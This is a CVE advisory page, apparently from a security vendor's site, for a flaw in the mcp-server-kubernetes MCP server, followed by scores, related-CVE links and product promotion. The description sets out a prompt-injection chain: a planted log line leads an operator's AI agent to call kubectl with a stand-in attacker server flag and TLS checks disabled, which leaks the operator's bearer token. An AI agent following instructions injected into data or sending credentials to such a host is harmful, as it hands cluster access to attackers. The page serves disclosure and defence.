CVE-2026-47250
Last modified
CVE-2026-47250 is a medium-severity vulnerability rated 6.1/10 on the CVSS scale. mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. EPSS estimates a 0.27% chance of exploitation in the next 30 days.
Description
mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Prior to version 3.7.0, the kubectl_generic tool in mcp-server-kubernetes passes user-supplied flags directly to kubectl without any allowlist, enabling a privilege escalation attack within Kubernetes environments. An attacker who already has limited cluster or codebase access, for example, a developer with pod-deployment permissions but not cluster-admin credentials, can plant a single structured JSON line in an application's log output. When an operator with a privileged kubeconfig uses the MCP server to read those logs and their AI agent follows the injected instruction, kubectl_generic is called with --server=https://attacker.example.com and --insecure-skip-tls-verify=true. kubectl sends all API requests, including the Authorization: Bearer <token> header from the operator's kubeconfig to the attacker's endpoint. The captured token can then be replayed directly against the real Kubernetes API server, granting the attacker the full RBAC permissions of the operator's service account. This issue has been patched in version 3.7.0.
Metrics
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N
Weakness Enumeration
References
Timeline
- Published
- Last Modified
- Status
- Deferred
Frequently Asked Questions
What is CVE-2026-47250?
How severe is CVE-2026-47250?
How do I fix CVE-2026-47250?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2026
- CVE-2026-47243Kata Containers is an open source project focusing on a stan…9.2
- CVE-2026-47244Netty is a network application framework for development of …5.3
- CVE-2026-47247libheif is a HEIF and AVIF file format decoder and encoder. …7.5
- CVE-2026-47248Parse Server is an open source backend that can be deployed …6.9
- CVE-2026-47249Klever-Go is the Go implementation of the Klever blockchain …7.5
- CVE-2026-4725Sandbox escape due to use-after-free in the Graphics: Canvas…10
- CVE-2026-47251libheif is a HEIF and AVIF file format decoder and encoder. …6.1
- CVE-2026-47254libheif is a HEIF and AVIF file format decoder and encoder. …6.1
- CVE-2026-47255AgenticMail gives AI agents real email addresses and phone n…8.2
- CVE-2026-4726Denial-of-service in the XML component. This vulnerability w…7.5
- CVE-2026-47260Koel is a free, open-source music streaming solution. Prior …7.7
- CVE-2026-47261Wasmtime is a runtime for WebAssembly. In versions prior to …7.5
Are you affected by CVE-2026-47250?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
